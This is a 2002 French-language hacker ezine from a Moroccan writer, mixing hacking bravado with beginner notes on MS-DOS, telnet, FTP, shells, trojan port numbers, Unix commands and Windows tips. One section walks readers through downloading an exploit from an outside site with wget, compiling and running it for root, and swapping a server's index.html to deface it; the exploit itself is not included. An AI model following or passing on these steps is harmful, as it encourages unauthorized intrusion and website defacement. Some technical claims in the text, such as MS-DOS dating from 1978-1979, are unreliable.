ezine
############################ #######################################
#################### 1RST YaZ MaG #################################
############## W.o.L.f H.a.C.k ############################
########## 08/06/02 N° 1 ########################
###########################################################################
-->DEDICACE & PREFACE
salam 3alikoom a tous les marocains qui ont decidé de vivre en underground
et suivre le chemin des dures qui ont fondé cette force absolue qui a pour
but d'informer plus que detruire..je vais pas rentrer dans les details je
profite du temps pour me presenter :) bein! mon nom c'est YaZ (le nom c pas
a la mode et pour des raisons de secu :), 20 ans programmeur&analyste
(c,vb,assembleur en cours )j'ai commencé le metier depuis 4 ans dans les
vieux cyber de la medina-X-et daba ca fait 2 ans que je pratique le hacking
et que la scene underground marocaine commence avec des jeunes talents
qui vont boulverser la logique :)
--je dedie cet E-zine a tous le staff #xxroot pife,sysiph,the_matrix,HiM,
mehdilson,X-hacker et les autres (sorry si j'ai oublié un nick :=)
-->lma9adirr :)
1)introduction au hacking
2)les principes de base
3)Ms-DoS
4)explication :
----telnet
-Qu' est-ce que Telnet ?
-les dangers de telnet!
-Comment lancer une communication par Telnet ?
--- ftp
-- shell
- port
5)hacker un site a l'aide d'un shell
6)les commandes unix pour vous debrouiller :)
7)astuces WiNtOwZz
8)misk al khitam (conclusion :)
indar sfrr:
_________
# je ne suis absolument pas le responsable de se que vous allez faire avec
ces trezors j'ai deposé ces infos pour le seul but (informatif) ni moi ou
le webmaster sont responsables
//////////////////////// INTRODUCTION AU HACKING /////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\ ----------------------- \\\\\\\\\\\\\\\\\\\\\\\\\
qui d'entre vous n'as jamais entendu parler du piratage informatique (hacking)
?en effet,le hacking c'est l'art de la strategie et du bon usage de la logique
informatique c'est un domaine tres vaste en ses multiples branches
d'ou on extracte le mot 'hacker' ce mot que tous les newbies veulent porter
ainsi, le hacking c'est l'acces et le maintien frauduleux total ou partiel
dans tous ou partie d'un systéme cette definition appartient a l'etat
question de faire peur aux chevaliers des etoiles :) .
/////////////////////// LES PRINCIPES DE BASE /////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\ --------------------- \\\\\\\\\\\\\\\\\\\\\\\\\\\\\
chaque hacker commence avec une idée fixe dans la tete et une attitude
differente
en ce qui concerne le hack mais au cours du temps et de l'experience il
commence a croire au principe de base du hacking et bien sur c'est defendre
la liberté d'expression et permettre au grand public de partager les petits
secrets de l'etat et etre au courant de se qui se passe loin de leurs yeux
outre, un hacker doit posseder une certaine logique informatique avec laquelle
il peut resoudre les problemes qu'il rencontre (pour s'infiltrer par ex)
plus la large imagination illimité pour combler la tâche car quand un vrai
hacker veux frappe a la porte son imagination est son seul obstacle ni les
firewalls (pare-feu) ni les antis peuvent le stopper.une derniere chose et
c'est
la plus importante c'est la veille informatique car comme vous le savez la
technologis avance a quatre pattes et l'informatique aussi et c'est normal
que les failles d'hier n'existent pas aujourd'hui et les sites security
explosent
de plus en plus les vulnerabilites et les patch convenables mis a jour.
/////////////////////// Ms-DoS //////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\ ------ \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
j'ai choisi de commencer l'ezine par une petite explication sur le systeme
d'exploitation le plus aimé dans le monde avec son interface a couper le
souffle
:) et ses multiples commandes car j'ai pensé que c'est un os (operating system)
pour bien s'initier.comme vous le savez Ms-DoS est un systeme d'exploitation
réalisé par la societe naziste mikrozoft (j'adore la nommer comme ca ;)
pour le micro-ordinateur IBM PC en 1978-1979.
la conception du systeme d'exploitation Ms-DoS et son fonctionnement en font
de lui l'un des systemes d'exploitation actuels les plus orientés vers l'avenir
sa portabilité excelente et son adaptabilité ont fait de dos le plus repandu
en micro-infomatique.Ms-DoS a connu un developpement rapide,il permet a partir
de la version 4 de prendre en consideration la gestin multitache (voir la
nouvelle gamme de micro-ordinateur 32 bits)
sans doute un de vous connait une des commandes connues de dos mais sachez
qu'il y'a d'autres que vous avez rarement entendu je cite des exemples
ci-dessous
DBLSPACE : augmenter la capacité de memoire d'un disque dur ou d'une disquette
c'est une interface pour compresser les disques selon deux methodes rapide
et personnalisée
VERIFY [on|off]: activer ou désactiver le vérification de l'ecriture sur
le disque
POWER : active ou désactive le gestionnaire de courant tapez power /? pour
plus d'infos
MSD : produire une analyse détaillée des données techniques de votre systéme
//////////////////////// EXPLICATIONS UTILES //////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\ ___________________ \\\\\\\\\\\\\\\\\\\\\\\\\\
j'ai choisi de vous faire expliquer des trucs qui sont tres indispensables
au matiere de l'informatique et font partie du computer vocabulary
alors je vous laisse admirer ces oeuvres :)
TELNET :
========
----> Qu' est-ce que Telnet ?
Telnet est un protocole permettant par l' intermédiaire d' une console de
communiquer avec une machine Unix et de lui faire éxecuter des commandes
en utilisant un minimum de ressources. Il est fréquement utilisé pour
relever sa boîte au lettre etc... mais représente également une opportunité
pour le pirate.
----> Quels sont les dangers de Telnet ?
Les dangers de Telnet varient selon les failles du serveur avec lequel on
communique. Cela peut aller de l' envoie de mail anonyme à l' utilisation
d' un cheval de troie situé sur le serveur.
----> Comment lancer une commucation par Telnet ?
Faites la procédure suivante : "Démarrez>Executer>Telnet".
La console se lance normalement, après quoi, il vous faudra saisir
l' adresse de l' hôte distant que vous souhaitez contacter.
exemple :
=========
meme sous mirc c'est possible de se connecter :)
/run telnet wa3.yaz.com 23
login : yaz
password : ******************************* et c pa encore fini :)
FTP :
=====
le célebre FTP (file tranfert protocol) ce service qui joue le role d'une
charrette entre le client et le serveur (relation qui merite d'etre expliké
dans un autre e-zine) ftp transfert les fichiers vers votre hebergeur
de sites.il permet aussi la gestion de fichiers sur le serveur (input/output) ou
gerer les comptes des utilisateurs voici quelques exemples:
---sur le navigateur web :
ftp://yaz@ftp.linuxdoom.com
si l'utilisateur a un compte dans le serveur il peut se connecter avec son
login et password sinon il peut se connecter (annonymous) ca veut dire avec
login : annonymous
password : yaz@email.dialk
---sur MS-dos :
tape ftp ===> open www.server.com
username : annonymous
password : yaz@email.dialk
SHELL:
=====
le shell est un interpréteur de commandes interactif c'est le programme
qui traduit et envoie vos commandes au noyau de votre système.
Ceci se produit parce que le noyau ne comprend pas les commandes
que vous lui donnez. Par exemple, quand vous tapez le " Cd ",
cette commande sera d'abord traduite à un niveau bas de langage
par l'interpréteur de commandes interactif et juste aprés cela,
envoyé au noyau (ou à votre unité centrale de traitement).
Imaginez-vous comment douloureux d'utiliser un
ordinateur si vous n'aviez pas un interpréteur de commandes
interactif? Vous avez dû utiliser un niveau bas de langage,
comme l'assembleur ou même le plus mauvais (binaire)
Si vous vouliez faire le"Cd". " vous devriez
écrire un groupe de nombres binaires (0 ou 1 )
ou un énorme énumère de 00101010. Pensez-vous vraiment que ceci
fonctionnerait avec des personnes? je pense avec des alienz ca va péter
PORT :
======
Les ports sur une machine sont des entrées sur votre pc qui vous permettent
d'échanger des informations dans un sens ou dans un autre avec une autre
machine. Sur Internet vous pouvez échanger énormément de données par
plusieurs ports différents à plusieurs machines. Chaque port a ses
caractéristiques, l'un permet de lire le courrier, l'autre permet de
communiquer par icq, un autre permet de télécharger des fichiers...
Il existes plusieurs centaines de ports différents sur une machine. Bref,
vous l'aurez compris, les ports sont indispensable à l'échange
d'informations par internet, cependant, comme ils constituent les seules
entrées existantes vers votre pc, c'est par la que les hackers pénètrent
dans votre machine et réciproquement, c'est par ces ports que vous vous
infiltrerez dans un serveur ou n'importe quel ordinateur.
Certain vous dirons sûrement quelque chose, comme le port 21 qui est celui
du ftp , le port 23 est aussi assez connu puisque c'est celui du telnet et
aussi l'entrée favorite de la majorité des troyens (d'où le nom Socket23),
le port 25 appelé SMTP permet d'envoyer du courrier et le port 110 (POP),
permet de relever celui ci.
Bref je vois pas trop quoi dire d'autre sur les ports sinon que si les
votres sont tous fermés, vous n'avez aucune chance, mais alors aucune,
de vous faire hacker. Ceci est valable bien sur si votre disque est saint,
c'est sur que si vous êtes infecté par au minimum un troyen ou si vous avez
une bombe logique camouflée quelque part dans votre ordinateur,
vous risquez d'avoir certains problèmes vu qu'un programme comme un troyen
a comme but premier d'ouvrir un port pour que le hacker puisse entrer
et faire ce qu'il veut.
******************NukeNabber et Port Watchers :*****************************
NukeNabber est un port watcher, c'est à dire que c'est un programme qui
a pour fonction de fermer vos ports d'écouter ce qui passe dessus.
Ca permet de savoir à tout moment si quelqu'un essaye de rentrer sur votre
machine, de vous nuker, de scanner vos ports, de vous flooder,
d'ouvrir une session ftp...de plus ça vous donne l'ip du mec qui veut
rentrer :-). Ce programme est donc indispensable pour votre sécurité.
Numéro des ports à watcher
Protocole
Type d'attaque possible par ce port
0
icmp
Bonne question du genre troyen mais sans taupe alors fermez ce port,
c'est l'un des + dangereux !!!
19
udp
21
tcp
Troyen (eh ouais c'est ftp les mecs !!!)
23
tcp
Troyen (et ça c'est telnet, NO COMMENT...!!!)
53
tcp
59
tcp
Nuker, Flooder
129
tcp
137
tcp
138
tcp
139
tcp
Nuker, Flooder
666
tcp
1027
tcp
1029
tcp
1032
tcp
5000
tcp
Troyen (par défaut celui du Sockets de troie)
5001
tcp
Troyen (Sockets de troie aussi)
12345
tcp
Troyen (par défaut celui de Netbus)
12346
tcp
Troyen (Netbus aussi)
30303
tcp
Troyen (je me souviens plus lequel)
31337
tcp
Troyen (par défaut celui de Back Orifice)
/////////////////////////// hacker un site a //////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\l'aide d'un shell\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
il n'ya pas une seule methode pour hacker un site mais ilk 'yas des tonnes
ca depent des failles et des configurations (os aussi)mais comme c'est un
premier essai je vais vous donner une petite astuces (teknik plutot) pour
hacker un site :
tout d'abord tu dois avoir un shell (c'est expliké en haut :)
a condition que tu sois familier avec les commandes unix/linux t'inquiete
pas je te file une liste des commandz juste en bas.apres tu dois faire
une petite recherche sur the best of the best google.com ===> exploits
surement ca vas etre 111111 matches found :) tu note bien la page de
telechargement
sur le site exemple www.haklolita.com/exploits/xload.c tu reviens a ton
shell obeissant et tu tape :
wget www.haklolita.com/exploits/xload.c *
* = cela vas telecharger l'exploit sur ton account (shell)
apres tu dois comiler l'exploit pour qu'il soit executable tu tapera ceci:
gcc -o xload xload.c *
* = cela vas comiler l'exploit et le mettre au dossier (xload)
nb : je vais traiter les exploits dans un autre e-mag be patient :)
apres ca tu le mets en marche pour le faire c simple
./xload
hola!! tu es root
#whoami
root waw
maintenant tu pex faire ce que tu veux sur le serveur modifier,supprimer,
ajouter,renommer foutre le bordel (dar dark asidi :)
apres avoir le root sur le serveur voulou (tu devras le scanner d'abord)
tu cherchera le fichier index.html et tu le modifie c'est simple
wget www.yaz.com/mymirror.htm
rm index.html
ren mymirror.htm index.htm
et le tour est jouée et n'oublie ceci est reinque un titi exemple au cours
du temps tu vas creer tes propres methodes de defacement ;) un pro koi
\\\\\\\\\\\\\\\\\\\\\\\\\____Commandes UNIX_____////////////////////////////
/////////////////////////=======================\\\\\\\\\\\\\\\\\\\\\\\\\\\\
Commandes de base : (avec équivalence DOS)
ls affiche les fichiers du répertoire (= DIR /W)
Switch -l : (liste) affiche tout ça en liste avec détails (= DIR)
Switch -a : (all) affiche aussi les fichiers cachés (on peut combiner -la ou
-al)
mkdir rep crée le répertoire rep (=mkdir DOS)
cd rep va dans le répertoire rep (comme DOS)
(répertoires spéciaux : . répertoire courant .. répertoire précédent)
(arborescence avec des / et non des \ comme DOS)
pwd donne le répertoire courant
emacs editeur interne de texte comme (=EDIT)
cat test.txt affiche test.txt (=TYPE)
more test.txt par page (=TYPE | more)
less test.txt on peut aussi revenir en arriere
mv source.txt dest.txt déplace le fichier (=MOVE)
cp source.txt dest.txt copie le fichier (=COPY)
./test lance test (= test)
export TERM=vt100 modifier une variable d’environnement (ici, fixe TERM à
vt100)
locate test cherche le fichier test dans l’arborescence (=DIR /S)
Compiler un programme en C :
gcc -Wall -o test test.c
Processus (= programmes résidents)
Un programme est en cours : appuyez sur CTRL C pour le terminer, CTRL Z pour le
mettre en pause (retour à l’interpreteur, mais le prog reste résident).
Réappeler le prog (./test) pour reprendre après CTRL Z.
ps liste des programmes résidents avec n° de processus (identificateur)
(le programme spécial bash est l’interpreteur, ne le fermez pas…)
Switch -f détails des niveaux de sécurité
Switch -a on voit les programmes résidents cachés (login)
Switch -l liste, gros détails (on peut combiner -la …)
Switch -x je n’ai po encore vu la différence avec le switch -f
bg ./test passe en tache de fond, le prog tourne, mais laisse la main à
l’interpreteur.
fg ./test passe le programme normalement (pour restorer apres bg)
./test & lance test et le met direct en tache de fond.
kill -KILL 14857 détruit le processus ayant comme n°14857 (numéro exemple)
top gestionnaire de processus (voit ceux de tout le réseau aussi)
Réseau :
nslookup nommachine retourne le n°IP de la machine dont on entre le nom
ping adrsIP retourne le ping en fonction de l’adresse IP (voir nslookup pour
avoir l’IP)
traceroute www.fvirtman.fr.st liste des routeurs empruntés pour aller sur mon
site
netstat affiche la connection de tous les ordis du réseau
telnet pour se connecter sur une machine distante.
lynx www.fvirtman.fr.st explorateur mode texte.
////////////////////// astuces WiNToWZ ////////////////////////////////////
\\\\\\\\\\\\\\\\\\\\\\ =============== \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
*** Changement de résolution et redémarrage
Lorsque vous effectuez une modification du nombre de couleurs de votre écran
à l'aide de Demarrer - Paramètres - Panneau de configuration - Affichage -
Onglet paramètres. Windows vous demande si vous voulez redémarrer Windows.
Cochez "Appliquer les modification sans redémarrer" car ce n'est pas
nécessaire.
*** Masquer le curseur de la souris
Le curseur vous gène lorsque vous tapez au clavier ? il existe une
possibilité de masque le curseur dès que vous tapez sur le clavier. Le
curseur de la souris reviendra dès que vous bougerez la souris. Pour ce
faire : Demarrer - Paramètres - Panneau de configuration - Souris - Onglet
Options du Pointeur - Cochez Masquez le pointeur en cours de frappe.
*** De petites icônes dans le Démarrer
Lors de la première installation de Windows, les icônes du Menu démarrer
sont en grand format ! Voici comment les réduire : Clic droit sur un espace
vide de la barre des tâches - Propriétés - Cochez "Afficher les Petites
icônes dans le Menu démarrer".
*** Indispensable !
Vous voulez modifier les chemins des dossiers systèmes (bureau, menu
démarrer ...), enlever la corbeille, Voisinage réseau, poste de travail ...
du bureau, enlever des icônes de votre panneau de configuration (pour éviter
toute mauvaise manipulation) ... Toutes ces commandes sont disponibles avec
ce logiciel gratuit qu'est Tweak UI.
*** Supprimer les entrées de Executer
Pour supprimer les entrées du menu Exécuter du Démarrer, il vous suffit de
vider l'historique sous Internet Explorer.
Menu Outils - Options Internet - Bouton "Effacer l'historique".
Ensuite fermez toutes les fenêtres Internet Explorer et Explorateur,
Demarrer - Arreter - cliquez sur annuler. Toutes les entrées du Exécuter
sont parties !
Fonctionnalités cachées de Exécuter
*** Vocabulaire
Effectuez un clic droit sur un dossier de votre bureau par exemple, vous
avez 2 commandes possibles : Ouvrir et Explorer. Quelle est la différence
entre ces 2 commandes ? Explorer vous ouvre l'explorateur de fichiers
(avec l'arborescence des répertoires sur la gauche), Ouvrir ne vous affiche
que le contenu du dossier (sans l'arborescence)
*** Quand vous insérez un CD ROM
Si vous voulez éviter le lancement automatique de CD Audio ou de données
lors de l'insertion, effectuez un clic droit sur Poste de travail - puis
propriétés - onglet gestionnaire de périphériques - localisez votre Lecteur
CD ROM dans la liste des matériels. Double cliquez dessus - onglet
Paramètres - décochez notification d'insertion automatique.
/////////////////////////////misk al khitam (conclusion :)////////////////
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\=============================\\\\\\\\\\\\\\\\
finalement, je souhaite que vous appreciez ce e-mag et je remercie encore une
fois X-hacker qui m'as bien aidé ainsi je remercie tous les newbies marocains
qui bavent pour le savoir et la connaissance et inchallah avec un peu de
courage tous vas vers le bien rdv au 2 e-mag prochainement
pour le contact : yaz4ever@caramail.com (pas de bomb mails plz :)
www.yaz.unixlover.com ===> under construction but not 4 long time :)